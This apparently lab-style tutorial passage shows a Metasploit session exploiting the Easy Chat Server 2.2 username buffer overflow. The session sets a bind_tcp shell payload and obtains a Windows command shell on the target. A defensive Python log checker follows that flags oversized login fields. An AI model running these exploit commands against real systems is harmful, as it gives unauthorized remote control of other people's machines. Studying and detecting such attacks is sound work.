Here the author attempts to exploit Easy Chat Server version 2.2, which has a buffer overflow in its authentication request handling. Because buffer overflows were already explained in the previous article, we can go straight to the practical part.
The target IP is 192.168.1.25. The exploitation proceeds as follows:
, ,
/ \
((__—,,,—__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13646 updated yesterday (2011.08.27)
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf > use exploit/windows/http/efs_easychatserver_username
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.25
msf exploit(efs_easychatserver_username) > exploit
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.25
[*] Started bind handler
[*] path: C:\Program Files\Easy Chat Server\users\
[*] Trying target Easy Chat Server 2.2...
[*] Sending stage (240 bytes) to 192.168.1.25
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Easy Chat Server>
Bingo, we got a shell.
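The same request seen from the defender's side, as an added example that is not part of the original post: a log check that flags login requests whose `username` field is oversized or carries non-printable bytes, which is what overflow input against the authentication handler looks like in an access log. The log format, the `/login` path, the source addresses and the 64-character limit are assumptions; only the `username` field name comes from the module name above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

MAX_USERNAME_LEN = 64  # assumption: longest username a legitimate client sends
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (hypothetical path and source addresses).
SAMPLE_LOG = [
    '192.168.1.10 - - [28/Aug/2011:10:00:01 +0700] "GET /login?username=alice&password=x HTTP/1.1" 200 512',
    '192.168.1.50 - - [28/Aug/2011:10:00:02 +0700] "GET /login?username='
    + "A" * 300 + '&password=x HTTP/1.1" 200 0',
    '192.168.1.51 - - [28/Aug/2011:10:00:03 +0700] "GET /login?username=bob%01%ffx&password=x HTTP/1.1" 200 0',
    'malformed line that the parser must skip',
]

def suspicious_logins(lines, field="username", limit=MAX_USERNAME_LEN):
    """Return (source, decoded_length, reason) for each request whose
    login field looks like overflow input rather than a real account name."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        query = urlsplit(m.group("uri")).query
        # latin-1 maps every percent-decoded byte to exactly one character,
        # so len(value) is the byte count the server would copy.
        for name, value in parse_qsl(query, keep_blank_values=True,
                                     encoding="latin-1"):
            if name.lower() != field:
                continue
            reasons = []
            if len(value) > limit:
                reasons.append("oversized")
            if any(ord(c) < 0x20 or ord(c) > 0x7E for c in value):
                reasons.append("non-printable bytes")
            if reasons:
                hits.append((m.group("src"), len(value), ", ".join(reasons)))
    return hits

if __name__ == "__main__":
    for src, length, reason in suspicious_logins(SAMPLE_LOG):
        print(f"ALERT {src}: username length {length} ({reason})")
```

Measuring the decoded length matters because percent-encoding triples the size of a byte in the raw log line, so a limit applied to the raw URI would not match what the server actually copies.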